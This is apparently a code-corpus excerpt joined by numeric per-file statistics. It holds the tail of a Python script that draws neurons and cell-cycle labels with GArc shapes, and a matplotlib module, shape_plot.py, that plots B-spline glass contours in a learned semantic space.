    _arc(260, 110, 150, 25, 'steelblue', 725, 195)  # foot 3
    _arc(50, 70, 150, 80, 'steelblue', 732, 184)
    _arc(15, 45, 150, 160, 'steelblue', 730, 208)   # foot 4
    _arc(12, 80, 50, 160, 'steelblue', 700, 224)    # foot 5
    _oval(20, 22, 'orange', 712, 195)               # nucleus
def g1_s2_cell():
    """Draw the G1/S-stage cell pair: a sky-blue neuron with fibers and a
    steel-blue neuron with a long trailing foot, each with an orange nucleus.

    Uses the module-level `window` (GWindow) defined elsewhere in this file.
    """
    def _arc(width, height, start, sweep, color, x, y):
        # Helper: filled GArc whose outline and fill share one color.
        shape = GArc(width, height, start, sweep)
        shape.filled = True
        shape.color = color
        shape.fill_color = color
        window.add(shape, x, y)

    def _oval(width, height, color, x, y):
        # Helper: filled GOval whose outline and fill share one color.
        shape = GOval(width=width, height=height)
        shape.filled = True
        shape.color = color
        shape.fill_color = color
        window.add(shape, x, y)

    # Sky-blue neuron.
    _oval(40, 60, 'skyblue', 800, 280)              # cell body
    _arc(50, 80, 250, 200, 'skyblue', 810, 270)
    _arc(55, 95, 70, 210, 'skyblue', 800, 265)
    _arc(40, 70, 80, 200, 'skyblue', 796, 280)
    _arc(35, 110, 45, 85, 'skyblue', 810, 340)
    _arc(10, 210, 95, 180, 'skyblue', 825, 70)      # first fiber
    _arc(9, 110, 75, 180, 'skyblue', 823, 28)       # on first fiber
    _arc(6, 40, 330, 200, 'skyblue', 816, 25)       # on first fiber head
    _arc(5, 55, 200, 170, 'skyblue', 827, 20)       # on first fiber head
    _arc(7, 80, 95, 180, 'skyblue', 820, 340)       # second fiber
    _arc(35, 80, 230, 90, 'skyblue', 809, 386)      # cell bottom
    _arc(35, 110, 215, 95, 'skyblue', 812, 225)     # cell head
    _oval(25, 45, 'orange', 805, 290)               # nucleus
    # Steel-blue neuron.
    _arc(120, 60, 270, 180, 'steelblue', 810, 150)
    _arc(35, 60, 90, 180, 'steelblue', 830, 150)
    _arc(20, 90, 270, 190, 'steelblue', 826, 70)
    _arc(50, 70, 140, 90, 'steelblue', 832, 115)
    _arc(15, 105, 270, 190, 'steelblue', 828, 170)
    _arc(160, 11, 120, 210, 'steelblue', 830, 271)  # foot
    _arc(50, 70, 240, 50, 'steelblue', 823, 245)
    _arc(15, 100, 190, 100, 'steelblue', 920, 251)
    _arc(10, 45, 190, 100, 'steelblue', 950, 255)
    _oval(20, 30, 'orange', 840, 165)               # nucleus
def lines():
    """Draw the four gray horizontal guide lines spanning x = 50..1150.

    The y-positions (425, 18, 300, 190) separate the horizontal bands of the
    figure. Uses the module-level `window` (GWindow).
    """
    for y in (425, 18, 300, 190):
        line = GLine(50, y, 1150, y)
        line.color = 'gray'
        window.add(line)
def neurons():
    """Draw the cluster of neurons on the right-hand side of the figure:
    several light-blue neurons with wheat nuclei and three steel-blue
    neurons with orange nuclei near the top.

    Uses the module-level `window` (GWindow). Shapes are added in the same
    order as before, so the stacking (z-order) is unchanged.
    """
    def _arc(width, height, start, sweep, color, x, y):
        # Helper: filled GArc whose outline and fill share one color.
        shape = GArc(width, height, start, sweep)
        shape.filled = True
        shape.color = color
        shape.fill_color = color
        window.add(shape, x, y)

    def _oval(width, height, color, x, y):
        # Helper: filled GOval whose outline and fill share one color.
        shape = GOval(width=width, height=height)
        shape.filled = True
        shape.color = color
        shape.fill_color = color
        window.add(shape, x, y)

    def _line(x0, y0, x1, y1):
        # Helper: gray GLine added without explicit placement coordinates.
        shape = GLine(x0, y0, x1, y1)
        shape.color = 'gray'
        window.add(shape)

    # First light-blue neuron, around (1050, 300).
    _arc(80, 80, 80, 180, 'lightblue', 1050, 300)     # left cell body
    _arc(80, 80, 265, 180, 'lightblue', 1048, 298)    # right cell body
    _arc(50, 50, 50, 80, 'lightblue', 1054, 370)      # bottom
    _arc(50, 60, 230, 70, 'lightblue', 1060, 277)     # head
    _arc(6, 50, 330, 190, 'lightblue', 1065, 20)      # on first fiber head
    _arc(25, 70, 30, 60, 'lightblue', 1072, 22)       # on first fiber head
    _arc(40, 50, 70, 180, 'wheat', 1060, 315)         # left cell nucleus
    _arc(35, 50, 255, 180, 'wheat', 1060, 313)        # right cell body nucleus
    _arc(9, 40, 80, 180, 'lightblue', 1068, 380)      # second fiber
    _arc(50, 50, 240, 70, 'lightblue', 1055, 398)
    # Second light-blue neuron, around (990, 280).
    _oval(40, 60, 'lightblue', 990, 280)              # cell body
    # NOTE(review): start == end, so this line has zero length and draws
    # nothing visible; presumably a typo in the endpoints — confirm intent.
    _line(140, 1090, 140, 1090)
    _arc(50, 80, 250, 200, 'lightblue', 1000, 270)
    _arc(55, 95, 70, 210, 'lightblue', 990, 265)
    _arc(40, 70, 80, 200, 'lightblue', 986, 280)
    _arc(35, 110, 45, 85, 'lightblue', 1000, 340)
    _arc(10, 210, 95, 180, 'lightblue', 1015, 70)     # first fiber
    _arc(7, 110, 270, 260, 'lightblue', 1011, 60)     # on first fiber
    _arc(9, 110, 75, 180, 'lightblue', 1013, 28)      # on first fiber
    _arc(6, 40, 330, 200, 'lightblue', 1006, 25)      # on first fiber head
    _arc(5, 55, 200, 170, 'lightblue', 1017, 20)      # on first fiber head
    _arc(7, 80, 95, 180, 'lightblue', 1010, 340)      # second fiber
    _arc(35, 80, 230, 90, 'lightblue', 999, 386)      # cell bottom
    _arc(35, 110, 215, 95, 'lightblue', 1002, 225)    # cell head
    _oval(25, 45, 'wheat', 995, 290)                  # nucleus
    # Third light-blue neuron, around (1090, 280).
    _oval(40, 60, 'lightblue', 1090, 280)             # cell body
    # NOTE(review): zero-length line again (start == end) — confirm intent.
    _line(140, 1190, 140, 1190)
    _arc(50, 80, 250, 200, 'lightblue', 1100, 270)
    _arc(55, 95, 70, 210, 'lightblue', 1090, 265)
    _arc(40, 70, 80, 200, 'lightblue', 1086, 280)
    _arc(35, 110, 45, 85, 'lightblue', 1100, 340)
    _arc(10, 210, 95, 180, 'lightblue', 1115, 70)     # first fiber
    _arc(7, 110, 270, 260, 'lightblue', 1111, 60)     # on first fiber
    _arc(9, 110, 75, 180, 'lightblue', 1113, 28)      # on first fiber
    _arc(6, 40, 330, 200, 'lightblue', 1106, 25)      # on first fiber head
    _arc(5, 55, 200, 170, 'lightblue', 1117, 20)      # on first fiber head
    _arc(7, 80, 95, 180, 'lightblue', 1110, 340)      # second fiber
    _arc(35, 80, 230, 90, 'lightblue', 1099, 386)     # cell bottom
    _arc(35, 110, 215, 95, 'lightblue', 1102, 225)    # cell head
    _oval(25, 45, 'wheat', 1095, 290)                 # nucleus
    # Center light-blue neuron, around (1038, 227).
    _oval(40, 70, 'lightblue', 1038, 227)
    _oval(40, 50, 'lightblue', 1031, 240)
    _arc(55, 65, 60, 200, 'lightblue', 1021, 230)
    _arc(80, 100, 210, 85, 'lightblue', 1035, 192)    # neuron head
    _arc(10, 210, 95, 180, 'lightblue', 1060, 70)     # first fiber
    _arc(5, 110, 75, 180, 'lightblue', 1063, 28)      # on first fiber
    _arc(6, 40, 330, 200, 'lightblue', 1055, 25)      # on first fiber head
    _arc(25, 70, 30, 70, 'lightblue', 1062, 22)       # on first fiber head
    _arc(9, 140, 80, 180, 'lightblue', 1042, 290)     # second fiber
    _arc(30, 80, 230, 90, 'lightblue', 1031, 386)     # cell bottom
    _arc(35, 80, 22, 113, 'lightblue', 1031, 283)     # cell bottom
    _arc(57, 45, 60, 170, 'wheat', 1033, 233)         # nucleus
    _arc(50, 50, 250, 150, 'wheat', 1032, 228)        # nucleus
    # First steel-blue neuron, around (1029, 64).
    _oval(40, 45, 'steelblue', 1029, 64)
    _arc(100, 100, 240, 60, 'steelblue', 1026, 23)
    _arc(135, 135, 350, 60, 'steelblue', 975, 70)
    _arc(145, 130, 130, 60, 'steelblue', 1052, 70)
    _arc(20, 50, 270, 190, 'steelblue', 1040, 24)
    _arc(175, 17, 80, 130, 'steelblue', 980, 98)
    _arc(180, 15, 300, 150, 'steelblue', 1030, 95)
    _oval(20, 25, 'orange', 1040, 70)                 # nucleus
    # Second steel-blue neuron, around (1089, 74).
    _oval(40, 45, 'steelblue', 1089, 74)
    _arc(100, 100, 240, 60, 'steelblue', 1086, 33)
    _arc(135, 135, 350, 60, 'steelblue', 1035, 80)
    _arc(145, 130, 130, 60, 'steelblue', 1112, 80)
    _arc(20, 50, 270, 190, 'steelblue', 1100, 34)
    _arc(175, 17, 80, 130, 'steelblue', 1040, 108)
    _arc(180, 15, 300, 150, 'steelblue', 1090, 105)
    _oval(20, 25, 'orange', 1100, 80)                 # nucleus
    # Third steel-blue neuron, around (969, 84).
    _oval(40, 45, 'steelblue', 969, 84)
    _arc(100, 100, 240, 60, 'steelblue', 966, 43)
    _arc(135, 135, 350, 60, 'steelblue', 915, 90)
    _arc(145, 130, 130, 60, 'steelblue', 992, 90)
    _arc(20, 70, 270, 190, 'steelblue', 980, 24)
    _arc(175, 17, 80, 130, 'steelblue', 920, 118)
    _arc(180, 15, 300, 150, 'steelblue', 970, 115)
    _oval(20, 25, 'orange', 980, 90)                  # nucleus
def word():
    """Add the text labels: stage names along the bottom (y=460), layer
    names down the left edge, and the journal citation in the corner.

    Uses the module-level `window` (GWindow).
    """
    # (text, x, y) for every size-15 label.
    labels = [
        ('G1/S', 120, 460),
        ('S', 240, 460),
        ('G2', 350, 460),
        ('M', 520, 460),
        ('G1', 690, 460),
        ('G1/S', 810, 460),
        ('VZ', 50, 370),
        ('SVZ', 45, 250),
        ('IZ', 52, 175),
        ('CP', 52, 55),
    ]
    for text, x, y in labels:
        label = GLabel(text)
        label.font = '-15'
        label.filled = True
        label.color = 'black'
        window.add(label, x, y)
    # The citation uses a smaller font, so it is not part of the loop above.
    citation = GLabel('J Cell Biol. 2005 Sep 12;170(6):935-45.')
    citation.font = '-8'
    citation.filled = True
    citation.color = 'black'
    window.add(citation, 1000, 490)
def arrow():
    """Draw the dark-gray arrow shapes (thin rectangles plus arcs) that
    connect the stages of the figure.

    Uses the module-level `window` (GWindow).
    """
    def _add(shape, x, y):
        # All arrow parts share the same dark-gray fill and outline.
        shape.filled = True
        shape.color = 'darkgray'
        shape.fill_color = 'darkgray'
        window.add(shape, x, y)

    _add(GRect(3, 60), 160, 350)
    _add(GArc(60, 60, 240, 60), 147, 323)
    _add(GRect(3, 60), 280, 270)
    _add(GArc(60, 60, 60, 60), 266, 323)
    _add(GRect(15, 3), 523, 390)
    _add(GArc(50, 50, 150, 60), 529, 379)
    _add(GArc(180, 7, 80, 130), 749, 182)
    _add(GArc(60, 60, 160, 60), 795, 167)
    _add(GRect(3, 60), 875, 120)
    _add(GArc(60, 60, 240, 60), 862, 93)
# Script entry point: only run when executed directly, not when imported.
if __name__ == '__main__':
    main()
| 29.283129
| 83
| 0.61502
| 6,256
| 45,301
| 4.410166
| 0.064578
| 0.093947
| 0.04382
| 0.053933
| 0.909967
| 0.90087
| 0.893186
| 0.87046
| 0.867742
| 0.863719
| 0
| 0.121666
| 0.249398
| 45,301
| 1,546
| 84
| 29.30207
| 0.689733
| 0.056754
| 0
| 0.738095
| 0
| 0
| 0.0982
| 0
| 0
| 0
| 0
| 0.001294
| 0
| 1
| 0.007937
| false
| 0
| 0.001443
| 0
| 0.00938
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
36d69627b48bf11686545644f9465c6ff6ab2176
| 21,000
|
py
|
Python
|
shape_plot.py
|
IDEALLab/design_embeddings_idetc_2016
|
f1a8d2b637707d8e76d3189e970310bf34755058
|
[
"MIT"
] | 1
|
2018-07-02T12:40:08.000Z
|
2018-07-02T12:40:08.000Z
|
shape_plot.py
|
IDEALLab/design_embeddings_idetc_2016
|
f1a8d2b637707d8e76d3189e970310bf34755058
|
[
"MIT"
] | null | null | null |
shape_plot.py
|
IDEALLab/design_embeddings_idetc_2016
|
f1a8d2b637707d8e76d3189e970310bf34755058
|
[
"MIT"
] | 2
|
2016-10-03T17:56:42.000Z
|
2021-06-04T13:18:12.000Z
|
"""
Plots samples or new shapes in the semantic space.
Author(s): Wei Chen (wchen459@umd.edu), Jonah Chazan (jchazan@umd.edu)
"""
from matplotlib import pyplot as plt
from sklearn import preprocessing
import numpy as np
import itertools
def scatter_plot(features, data_rec, train, test, parameterizations_train, parameterizations_test,
                 splines_train, splines_test, x_plots_train, x_plots_test, save_path, name_algorithm, mirror=True):
    ''' Create 3D scatter plot and corresponding 2D projections
    of at most the first 3 dimensions of data.

    features: (n_samples, n_dim) array of semantic-space coordinates.
    train / test: index lists selecting the training / testing rows of `features`.
    parameterizations_* / splines_* / x_plots_*: per-sample spline data used to
    draw each sample's contour next to its scatter point.
    data_rec: kept for interface compatibility; the reconstructed-sample
    drawing code that used it was dead (commented out) and has been removed.
    mirror: also draw the x-mirrored half of each contour.

    Saves 'save_path+name_algorithm+/3d.png' (when n_dim == 3) and one
    '<i>-<j>.png' per pair of dimensions.
    '''
    plt.rc("font", size=font_size)  # font_size: module-level setting defined elsewhere in this file
    n_dim = features.shape[1]

    if n_dim == 3:
        # 3D overview scatter of all samples first.
        fig3d = plt.figure()
        ax3d = fig3d.add_subplot(111, projection='3d')
        ax3d.scatter(features[:, 0], features[:, 1], features[:, 2])
        ax3d.set_title(name_algorithm)
        plt.savefig(save_path+name_algorithm+'/3d.png', dpi=300)
        plt.close()

    features_train = features[train]
    features_test = features[test]

    def _draw(axis, n_samples, feats, splines, params, x_plots, i, j, color):
        # Scatter each sample at (feats[:, i], feats[:, j]) and overlay its
        # contour, scaled to ~0.08 axis units; the train and test loops were
        # identical apart from these arguments.
        for index in range(n_samples):
            axis.scatter(feats[index, i], feats[index, j], s=7)
            m = splines[index].M(params[index], x_plots[index]).tolist()
            ys = [y for (x, y) in m]
            # x and y used the same scale in the original (both .08/(mx-mn)).
            scl = .08 / (max(ys) - min(ys))
            axis.plot(*zip(*[(x * scl + feats[index, i], -y * scl + feats[index, j])
                             for (x, y) in m]), color=color)
            if mirror:
                axis.plot(*zip(*[(-x * scl + feats[index, i], -y * scl + feats[index, j])
                                 for (x, y) in m]), color=color)

    # Project to a 2D plot for every pair of dimensions.
    k = 0
    figs = []
    ax = []
    for i in range(0, n_dim-1):
        for j in range(i+1, n_dim):
            figs.append(plt.figure())
            ax.append(figs[k].add_subplot(111))
            # Training samples in red, testing samples in blue.
            _draw(ax[k], len(train), features_train, splines_train,
                  parameterizations_train, x_plots_train, i, j, 'red')
            _draw(ax[k], len(test), features_test, splines_test,
                  parameterizations_test, x_plots_test, i, j, 'blue')
            ax[k].set_title(name_algorithm)
            plt.xlim(-0.1, 1.1)
            plt.ylim(-0.1, 1.1)
            plt.xlabel('Dimension-'+str(i+1))
            plt.ylabel('Dimension-'+str(j+1))
            k += 1
            plt.savefig(save_path+name_algorithm+'/'+str(i+1)+'-'+str(j+1)+'.png', dpi=300)
            plt.close()
def plot_semantic_space_grid(points_per_axis, n_dim, min_maxes, inverse_transform, save_path, name_algorithm,
                             spline, boundary=None, kde=None, n_init_points=1000, mirror=True):
    ''' Plot reconstructed glass contours in the semantic space.
    If the semantic space is 3D (i.e., n_dim=3), plot one slice of the 3D space at each time.

    points_per_axis: grid resolution per semantic dimension.
    min_maxes: per-dimension (min, max) ranges used to build the grid.
    inverse_transform: maps semantic-space coordinates back to B-spline control points.
    boundary: optional half-space matrix; grid points with any np.dot(boundary, [c, 1]) > 0 are skipped.
    kde: optional density estimator; its scores set contour alpha and the sparsity annotations.
    mirror: also draw the x-mirrored half of each contour.
    '''
    plt.rc("font", size=font_size)  # font_size: module-level setting defined elsewhere in this file
    linewidth = 3
    u0 = spline.uniform_parameterisation(n_init_points)
    # Build the regular grid of semantic-space coordinates.
    lincoords = []
    for i in range(0,n_dim):
        lincoords.append(np.linspace(min_maxes[i][0],min_maxes[i][1],points_per_axis))
    coords = list(itertools.product(*lincoords)) # Create a list of coordinates in the semantic space
    coords_norm = preprocessing.MinMaxScaler().fit_transform(coords) # Min-Max normalization
    if kde is not None:
        # Density evaluation for coords_norm
        kde_scores = np.exp(kde.score_samples(coords_norm))
    coords_norm = coords_norm.tolist()
    data_rec = inverse_transform(np.array(coords)) # Reconstruct B-spline control points
    # Determine if the i-th item of coords_norm is in the convex hull
    indices = []
    for i in range(len(coords)):
        c = tuple(coords_norm[i]) + (1,)  # homogeneous coordinate for the half-space test
        if boundary is not None:
            e = np.dot(boundary, np.expand_dims(c, axis=1))
        if boundary is None or np.all(e <= 0):
            #if kde is None or kde_scores[i] > 0.25:
            indices.append(i)
    if n_dim < 3:
        # Create a 2D plot
        fig = plt.figure()
        ax = fig.add_subplot(111)
        for i in indices:
            ax.scatter(coords_norm[i][0], coords_norm[i][1], s = 7)
            m = spline.M(u0, data_rec[i].reshape((-1,2))).tolist()
            mx = max([y for (x, y) in m])
            mn = min([y for (x, y) in m])
            # Scale each contour to ~0.7 of a grid cell.
            xscl = .7 / (mx - mn) / points_per_axis
            yscl = .7 / (mx - mn) / points_per_axis
            # NOTE(review): kde_scores is only assigned when kde is not None,
            # so this line raises NameError when kde is None — confirm that
            # callers of the 2D path always pass a kde.
            alpha = kde_scores[i] + .3
            if alpha > 1:
                alpha = 1
            ax.plot( *zip(*[(x * xscl + coords_norm[i][0], -y * yscl + coords_norm[i][1]) for (x, y) in m]), linewidth=linewidth, color='blue', alpha=alpha)
            if mirror:
                ax.plot( *zip(*[(-x * xscl + coords_norm[i][0], -y * yscl + coords_norm[i][1]) for (x, y) in m]), linewidth=linewidth, color='blue', alpha=alpha)
        ax.set_title(name_algorithm, fontsize=20)
        plt.xlim(-0.1, 1.1)
        plt.ylim(-0.1, 1.1)
        plt.xlabel('Dimension-1')
        plt.ylabel('Dimension-2')
        plt.savefig(save_path+name_algorithm+'/' + 'semantic_space.png', dpi=300)
        if kde is not None:
            # Re-save the same figure with per-point density annotations.
            for i in indices:
                # Compute and annotate sparsity for coords_norm[i]
                #kde_score = np.exp(kde.score_samples(np.reshape(coords_norm[i], (1, -1))))[0]
                ax.annotate('{:.2f}'.format(kde_scores[i]), (coords_norm[i][0], coords_norm[i][1]), fontsize=12)
            plt.savefig(save_path+name_algorithm+'/'+'semantic_space_sparsity.png', dpi=300)
        plt.close()
    else:
        # Create slices of 2D plots for n_dim = 3
        coords_norm = np.array(coords_norm)[indices,:]
        data_rec = data_rec[indices,:]
        # Sort coords_norm and data_rec simultanously by the 3rd column in coords_norm (z coordinates)
        cc = np.concatenate((coords_norm, data_rec), axis=1)
        cc = cc[np.argsort(cc[:,2])]
        coords_norm = cc[:,:3]
        data_rec = cc[:,3:]
        k = 0
        figs = []
        ax = []
        figs.append(plt.figure())
        ax.append(figs[k].add_subplot(111))
        z = coords_norm[0,2]
        for i in range(len(coords_norm)):
            if coords_norm[i, 2] == z:
                # Same z slice: keep drawing into the current figure.
                ax[k].scatter(coords_norm[i, 0], coords_norm[i, 1], s = 7)
                m = spline.M(u0, data_rec[i].reshape((-1,2))).tolist()
                mx = max([y for (x, y) in m])
                mn = min([y for (x, y) in m])
                xscl = .7 / (mx - mn) / points_per_axis
                yscl = .7 / (mx - mn) / points_per_axis
                ax[k].plot( *zip(*[(x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color='blue')
                if mirror:
                    ax[k].plot( *zip(*[(-x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color='blue')
            else:
                # z changed: finalize and save the current slice figure, then
                # start a new figure and draw the current point into it.
                ax[k].set_title(name_algorithm+' (z = '+str(z)+')')
                plt.xlim(-0.1, 1.1)
                plt.ylim(-0.1, 1.1)
                plt.xlabel('Dimension-1')
                plt.ylabel('Dimension-2')
                plt.savefig(save_path+name_algorithm+'/semantic_space_z='+str(z)+'.png', dpi=300)
                plt.close()
                k += 1
                z = coords_norm[i, 2]
                figs.append(plt.figure())
                ax.append(figs[k].add_subplot(111))
                ax[k].scatter(coords_norm[i, 0], coords_norm[i, 1], s = 7)
                m = spline.M(u0, data_rec[i].reshape((-1,2))).tolist()
                mx = max([y for (x, y) in m])
                mn = min([y for (x, y) in m])
                xscl = .7 / (mx - mn) / points_per_axis
                yscl = .7 / (mx - mn) / points_per_axis
                ax[k].plot( *zip(*[(x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color='blue')
                if mirror:
                    ax[k].plot( *zip(*[(-x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color='blue')
        # if kde is not None:
        #     for i in indices:
        #         # Compute and annotate sparsity for coords_norm[i]
        #         #kde_score = np.exp(kde.score_samples(np.reshape(coords_norm[i], (1, -1))))[0]
        #         ax[k].annotate('{:.2f}'.format(kde_scores[i]), (coords_norm[i][0], coords_norm[i][1]), fontsize=16)
        #     plt.savefig(save_path+name_algorithm+'/'+'semantic_space_sparsity.png', dpi=300)
        #     plt.close()
        # Save the final (last) slice, which the loop above never flushes.
        ax[k].set_title(name_algorithm+' (z = '+str(z)+')')
        plt.xlim(-0.1, 1.1)
        plt.ylim(-0.1, 1.1)
        plt.xlabel('Dimension-1')
        plt.ylabel('Dimension-2')
        plt.savefig(save_path+name_algorithm+'/semantic_space_z='+str(z)+'.png', dpi=300)
        plt.close()
def plot_original_space_grid(points_per_axis, n_dim, min_maxes, inverse_transform, save_path, name_algorithm,
                             spline, n_init_points=1000, mirror=True):
    '''Plot reconstructed glass contours on a regular grid in the semantic space.

    If the semantic space is 3D (i.e., n_dim=3), one 2D slice is plotted per
    distinct z value.

    points_per_axis: number of grid points per semantic dimension.
    n_dim: dimensionality of the semantic space (2D and 3D layouts supported).
    min_maxes: per-dimension (min, max) ranges used to build the grid.
    inverse_transform: callable mapping semantic coordinates back to
        B-spline control points.
    save_path / name_algorithm: output path prefix and plot-title label.
    spline: object providing uniform_parameterisation() and M().
    n_init_points: number of spline evaluation parameters.
    mirror: if True, also draw the x-mirrored half of each contour.
    '''
    print("plotting original space")
    plt.rc("font", size=font_size)
    u0 = spline.uniform_parameterisation(n_init_points)
    # BUGFIX: `color` was only assigned inside the 2D branch, so the 3D branch
    # raised NameError. Define it once for both branches.
    color = 'blue'

    def draw_contour(axis, i):
        # Scatter the sample location and draw its reconstructed contour,
        # scaled to fit inside one grid cell and centered on the location.
        axis.scatter(coords_norm[i, 0], coords_norm[i, 1], s=7)
        m = spline.M(u0, data_rec[i].reshape((-1, 2))).tolist()
        mx = max([y for (x, y) in m])
        mn = min([y for (x, y) in m])
        xscl = .7 / (mx - mn) / points_per_axis
        yscl = .7 / (mx - mn) / points_per_axis
        axis.plot(*zip(*[(x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color=color)
        if mirror:
            axis.plot(*zip(*[(-x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color=color)

    lincoords = []
    for d in range(0, n_dim):
        lincoords.append(np.linspace(min_maxes[d][0], min_maxes[d][1], points_per_axis))
    coords = list(itertools.product(*lincoords))  # all grid coordinates in the semantic space
    coords_norm = preprocessing.MinMaxScaler().fit_transform(coords)  # Min-Max normalization
    data_rec = inverse_transform(np.array(coords))  # reconstruct B-spline control points
    indices = range(len(coords))
    if n_dim < 3:
        # Single 2D plot containing every grid point.
        fig = plt.figure()
        ax = fig.add_subplot(111)
        for i in indices:
            draw_contour(ax, i)
        ax.set_title(name_algorithm, fontsize=20)
        plt.xlim(-0.1, 1.1)
        plt.ylim(-0.1, 1.1)
        plt.xlabel('a')
        plt.ylabel('b')
        plt.savefig(save_path + 'semantic_space.png', dpi=300)
        plt.close()
    else:
        # One 2D slice per distinct z value (n_dim == 3).
        coords_norm = np.array(coords_norm)[indices, :]
        data_rec = data_rec[indices, :]
        # Sort coords_norm and data_rec simultaneously by the 3rd column of
        # coords_norm (z coordinates) so equal-z samples are contiguous.
        cc = np.concatenate((coords_norm, data_rec), axis=1)
        cc = cc[np.argsort(cc[:, 2])]
        coords_norm = cc[:, :3]
        data_rec = cc[:, 3:]
        k = 0
        figs = []
        ax = []
        figs.append(plt.figure())
        ax.append(figs[k].add_subplot(111))
        z = coords_norm[0, 2]
        for i in range(len(coords_norm)):
            if coords_norm[i, 2] == z:
                draw_contour(ax[k], i)
            else:
                # z changed: finish and save the current slice, then start a
                # fresh figure for the new z value.
                ax[k].set_title(name_algorithm + ' (Semantic feature 3 = ' + str(z) + ')')
                plt.xlim(-0.1, 1.1)
                plt.ylim(-0.1, 1.1)
                plt.xlabel('Semantic feature 1')
                plt.ylabel('Semantic feature 2')
                plt.savefig(save_path + name_algorithm + '/semantic_space_z=' + str(z) + '.png', dpi=300)
                plt.close()
                k += 1
                z = coords_norm[i, 2]
                figs.append(plt.figure())
                ax.append(figs[k].add_subplot(111))
                draw_contour(ax[k], i)
        # Save the last slice (the loop above only saves on z transitions).
        ax[k].set_title(name_algorithm + ' (Semantic feature 3 = ' + str(z) + ')')
        plt.xlim(-0.1, 1.1)
        plt.ylim(-0.1, 1.1)
        plt.xlabel('Semantic feature 1')
        plt.ylabel('Semantic feature 2')
        plt.savefig(save_path + name_algorithm + '/semantic_space_z=' + str(z) + '.png', dpi=300)
        plt.close()
def plot_original_space_examples(points_per_axis, n_dim, min_maxes, inverse_transform, save_path, name_algorithm,
                                 spline, samples, n_init_points=1000, mirror=True):
    '''Plot reconstructed glass contours for specific sample points in the
    semantic space.

    If the semantic space is 3D (i.e., n_dim=3), one 2D slice is plotted per
    distinct z value.

    samples: semantic-space coordinates of the examples to reconstruct.
    inverse_transform: callable mapping semantic coordinates back to
        B-spline control points.
    Other parameters match plot_original_space_grid; min_maxes is kept for
    signature compatibility even though no grid is built here.
    '''
    print("plotting original space")
    plt.rc("font", size=font_size)
    u0 = spline.uniform_parameterisation(n_init_points)
    # BUGFIX: `color` was only assigned inside the 2D branch, so the 3D branch
    # raised NameError. Define it once for both branches (examples are red).
    color = 'red'

    def draw_contour(axis, i):
        # Scatter the sample location and draw its reconstructed contour,
        # scaled to fit inside one grid cell and centered on the location.
        axis.scatter(coords_norm[i, 0], coords_norm[i, 1], s=7)
        m = spline.M(u0, data_rec[i].reshape((-1, 2))).tolist()
        mx = max([y for (x, y) in m])
        mn = min([y for (x, y) in m])
        xscl = .7 / (mx - mn) / points_per_axis
        yscl = .7 / (mx - mn) / points_per_axis
        axis.plot(*zip(*[(x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color=color)
        if mirror:
            axis.plot(*zip(*[(-x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color=color)

    coords = samples
    coords_norm = preprocessing.MinMaxScaler().fit_transform(coords)  # Min-Max normalization
    data_rec = inverse_transform(np.array(coords))  # reconstruct B-spline control points
    indices = range(len(coords))
    if n_dim < 3:
        # Single 2D plot containing every example.
        fig = plt.figure()
        ax = fig.add_subplot(111)
        for i in indices:
            draw_contour(ax, i)
        ax.set_title(name_algorithm, fontsize=20)
        plt.xlim(-0.1, 1.1)
        plt.ylim(-0.1, 1.1)
        plt.xlabel('a')
        plt.ylabel('b')
        plt.savefig(save_path + 'samples.png', dpi=300)
        plt.close()
    else:
        # One 2D slice per distinct z value (n_dim == 3).
        coords_norm = np.array(coords_norm)[indices, :]
        data_rec = data_rec[indices, :]
        # Sort coords_norm and data_rec simultaneously by the 3rd column of
        # coords_norm (z coordinates) so equal-z samples are contiguous.
        cc = np.concatenate((coords_norm, data_rec), axis=1)
        cc = cc[np.argsort(cc[:, 2])]
        coords_norm = cc[:, :3]
        data_rec = cc[:, 3:]
        k = 0
        figs = []
        ax = []
        figs.append(plt.figure())
        ax.append(figs[k].add_subplot(111))
        z = coords_norm[0, 2]
        for i in range(len(coords_norm)):
            if coords_norm[i, 2] == z:
                draw_contour(ax[k], i)
            else:
                # z changed: finish and save the current slice, then start a
                # fresh figure for the new z value.
                ax[k].set_title(name_algorithm + ' (Semantic feature 3 = ' + str(z) + ')')
                plt.xlim(-0.1, 1.1)
                plt.ylim(-0.1, 1.1)
                plt.xlabel('Semantic feature 1')
                plt.ylabel('Semantic feature 2')
                plt.savefig(save_path + name_algorithm + '/semantic_space_z=' + str(z) + '.png', dpi=300)
                plt.close()
                k += 1
                z = coords_norm[i, 2]
                figs.append(plt.figure())
                ax.append(figs[k].add_subplot(111))
                draw_contour(ax[k], i)
        # Save the last slice (the loop above only saves on z transitions).
        ax[k].set_title(name_algorithm + ' (Semantic feature 3 = ' + str(z) + ')')
        plt.xlim(-0.1, 1.1)
        plt.ylim(-0.1, 1.1)
        plt.xlabel('Semantic feature 1')
        plt.ylabel('Semantic feature 2')
        plt.savefig(save_path + name_algorithm + '/semantic_space_z=' + str(z) + '.png', dpi=300)
        plt.close()
# Default font size applied via plt.rc("font", ...) by the plotting helpers above.
font_size = 18
| 46.979866
| 161
| 0.516905
| 2,987
| 21,000
| 3.50385
| 0.073987
| 0.096503
| 0.072521
| 0.034779
| 0.863845
| 0.854863
| 0.837665
| 0.811485
| 0.811485
| 0.809192
| 0
| 0.034512
| 0.33081
| 21,000
| 446
| 162
| 47.085202
| 0.71024
| 0.079286
| 0
| 0.803681
| 0
| 0
| 0.040142
| 0.001594
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.01227
| null | null | 0.006135
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
